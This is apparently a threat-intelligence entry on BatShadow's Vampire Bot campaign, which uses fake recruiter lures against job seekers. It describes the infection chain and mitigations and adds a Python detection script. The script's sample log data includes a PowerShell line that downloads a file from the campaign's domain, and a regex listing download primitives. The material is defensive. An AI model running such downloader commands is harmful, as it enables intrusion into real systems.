BatShadow Group Uses New Go-Based 'Vampire Bot' Malware to Hunt Job Seekers
A Vietnamese threat actor named BatShadow has been attributed to a new campaign that leverages social engineering tactics to deceive job seekers and digital marketing professionals to deliver a previously undocumented malware called Vampire Bot. "The attackers pose as recruiters, distributing malicious files disguised as job descriptions and corporate documents," Aryaka Threat Research Labs
AI Analysis
Technical Summary
The BatShadow group, a Vietnamese cyber threat actor, has been identified deploying a novel Go-based malware named Vampire Bot in a targeted campaign against job seekers and digital marketing professionals. The attackers use social engineering by masquerading as recruiters and sending malicious files disguised as legitimate job descriptions and corporate documents. The infection chain begins with ZIP archives containing decoy PDF files alongside malicious shortcut (LNK) or executable files masked as PDFs. When a victim opens the LNK file, it executes an embedded PowerShell script that contacts an external server to download a lure PDF and a ZIP archive containing XtraViewer remote desktop software, likely to establish persistent access. The campaign employs browser-specific social engineering by instructing victims to open malicious URLs in Microsoft Edge, circumventing script-blocking mechanisms in other browsers. The final payload, Vampire Bot, is capable of profiling the infected system, stealing diverse information, capturing screenshots at configurable intervals, and maintaining communication with a command-and-control server to execute commands or download additional payloads. The malware's use of the Go language suggests cross-platform potential and ease of evasion. BatShadow has a history of targeting digital marketing professionals with stealer malware and has previously deployed other malware families such as Agent Tesla and Venom RAT. The campaign's sophistication, multi-stage infection chain, and targeted social engineering tactics highlight a focused effort to compromise professional users for espionage or financial gain.
Potential Impact
European organizations, particularly those involved in recruitment, human resources, and digital marketing, face significant risks from this campaign. The malware’s ability to steal sensitive information, including credentials and business data, threatens confidentiality and could lead to identity theft, corporate espionage, or financial fraud. The use of remote desktop software for persistence increases the risk of long-term unauthorized access and lateral movement within networks, potentially compromising critical infrastructure and intellectual property. The social engineering tactics exploit common job-seeking behaviors, increasing the likelihood of successful infection. Additionally, the campaign’s evasion of browser security controls and multi-stage payload delivery complicate detection and response efforts. This threat could disrupt recruitment processes, damage brand reputation, and result in regulatory penalties under GDPR if personal data is exfiltrated. The targeting of digital marketing professionals also risks hijacking social media and advertising accounts, which could be leveraged for further attacks or misinformation campaigns.
Mitigation Recommendations
Organizations should implement targeted user awareness training focused on recognizing recruitment-related phishing and social engineering tactics, emphasizing caution with unsolicited job offers and attachments. Deploy advanced email filtering solutions capable of detecting and quarantining ZIP archives with suspicious contents and executable files masquerading as documents. Enforce application control policies to prevent execution of unauthorized LNK and executable files, especially those with double extensions like '.pdf.exe'. Monitor network traffic for unusual outbound connections to suspicious domains such as 'api3.samsungcareers[.]work' and IP addresses linked to the threat actor. Restrict or closely monitor the use of remote desktop software like XtraViewer, ensuring it is only installed and used with proper authorization. Employ endpoint detection and response (EDR) tools capable of identifying PowerShell script execution and anomalous process behaviors. Encourage users to verify URLs independently rather than following instructions to switch browsers for downloads, and consider browser policy controls to limit risky behaviors. Regularly update and patch systems to reduce the attack surface and conduct threat hunting for indicators of compromise related to BatShadow’s known infrastructure and malware signatures.
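As an added example (not code from the article or from Aryaka Threat Research Labs), the following Python hunt runs the indicator checks listed above over a handful of constructed Sysmon-style log lines: document-then-executable double extensions such as '.pdf.exe' or '.pdf.lnk', Explorer-launched PowerShell that downloads content, the XtraViewer binary, and DNS lookups for the domain named in the recommendations. The log line format, the refanged form of the defanged domain, the parent-process assumption (a shortcut opened from Explorer starts powershell.exe with explorer.exe as its parent), the sample events and the rule names are all assumptions of this example rather than details from the page.

```python
"""Constructed example: hunt process-creation and DNS events for the indicators
named in the advisory (double extensions, LNK-style PowerShell downloaders,
XtraViewer, and the watchlisted domain). Log format and sample data are made up."""
import re
import shlex

# Indicator from the advisory; the page prints it defanged as api3.samsungcareers[.]work.
WATCHLIST_DOMAINS = {"api3.samsungcareers.work"}
# Remote desktop software the advisory says should only run with authorisation.
WATCHLIST_TOOLS = {"xtraviewer"}
DOC_EXTS = (".pdf", ".doc", ".docx", ".xls", ".xlsx")
EXEC_EXTS = (".exe", ".lnk", ".scr", ".bat", ".cmd")
# Real PowerShell download primitives. On their own they are a weak signal, so the
# rule below also requires explorer.exe as parent (a shortcut opened by the user).
DOWNLOAD_RE = re.compile(
    r"Invoke-WebRequest|\biwr\b|DownloadFile|DownloadString|Start-BitsTransfer", re.I
)

# Constructed sample events: '<timestamp> <type> key=value key="quoted value"'.
SAMPLE_LOGS = r"""
2025-10-08T09:11:58Z proc parent=explorer.exe image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmdline="powershell.exe -c Invoke-WebRequest http://api3.samsungcareers.work/jd.pdf -OutFile jd.pdf"
2025-10-08T09:11:59Z dns query=api3.samsungcareers.work
2025-10-08T09:12:30Z proc parent=powershell.exe image="C:\Users\alice\AppData\Local\Temp\XtraViewer\XtraViewer.exe" cmdline="XtraViewer.exe"
2025-10-08T09:40:02Z proc parent=explorer.exe image="C:\Users\alice\Downloads\Offer_Letter.pdf.exe" cmdline="Offer_Letter.pdf.exe"
2025-10-08T10:02:11Z proc parent=explorer.exe image="C:\Program Files\Adobe\Acrobat.exe" cmdline="Acrobat.exe Offer_Letter.pdf"
2025-10-08T10:05:00Z dns query=careers.example.com
"""


def parse_event(line):
    """Split one log line into a dict; shlex keeps quoted values (with backslashes) intact."""
    ts, kind, rest = line.split(" ", 2)
    fields = {"ts": ts, "type": kind}
    for token in shlex.split(rest):
        key, _, value = token.partition("=")
        fields[key] = value
    return fields


def double_extension(path):
    """True for names like Job_Description.pdf.exe or Offer.pdf.lnk: a document
    extension immediately followed by an executable one."""
    name = path.replace("\\", "/").rsplit("/", 1)[-1].lower()
    return any(name.endswith(doc + exe) for doc in DOC_EXTS for exe in EXEC_EXTS)


def analyse(event):
    """Return a list of (rule, detail) hits for one parsed event."""
    hits = []
    if event["type"] == "proc":
        image = event.get("image", "")
        parent = event.get("parent", "").lower()
        cmd = event.get("cmdline", "")
        if double_extension(image):
            hits.append(("double-extension executable", image))
        if (image.lower().endswith("powershell.exe")
                and parent.endswith("explorer.exe")
                and DOWNLOAD_RE.search(cmd)):
            hits.append(("user-launched PowerShell downloader (LNK-style lure)", cmd))
        if any(tool in image.lower() for tool in WATCHLIST_TOOLS):
            hits.append(("unauthorised remote desktop tool", image))
    elif event["type"] == "dns":
        query = event.get("query", "").lower().rstrip(".")
        # Match the domain itself and any subdomain of it.
        if any(query == d or query.endswith("." + d) for d in WATCHLIST_DOMAINS):
            hits.append(("watchlisted C2/staging domain", query))
    return hits


def hunt(log_text):
    """Run every rule over newline-separated events; returns [(ts, rule, detail)]."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        event = parse_event(line)
        for rule, detail in analyse(event):
            findings.append((event["ts"], rule, detail))
    return findings


if __name__ == "__main__":
    for ts, rule, detail in hunt(SAMPLE_LOGS):
        print(f"{ts}  {rule}: {detail}")
```

Against the constructed sample the hunt raises four findings and stays silent on the legitimate Acrobat launch and the unrelated DNS query. Each rule is deliberately narrow: the PowerShell rule keys on the parent process rather than on PowerShell alone, so routine administrative scripts do not flood the queue, and the domain rule also catches subdomains of the watchlisted host.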
Affected Countries
Germany, United Kingdom, France, Netherlands, Italy, Spain, Poland
Technical Details
- Article Source: https://thehackernews.com/2025/10/batshadow-group-uses-new-go-based.html (fetched 2025-10-09T01:05:06.767Z, word count 1228)
Threat ID: 68e70a4432de7eb26af4e14a
Added to database: 10/9/2025, 1:05:08 AM
Last enriched: 10/9/2025, 1:06:53 AM
Last updated: 11/22/2025, 3:11:12 AM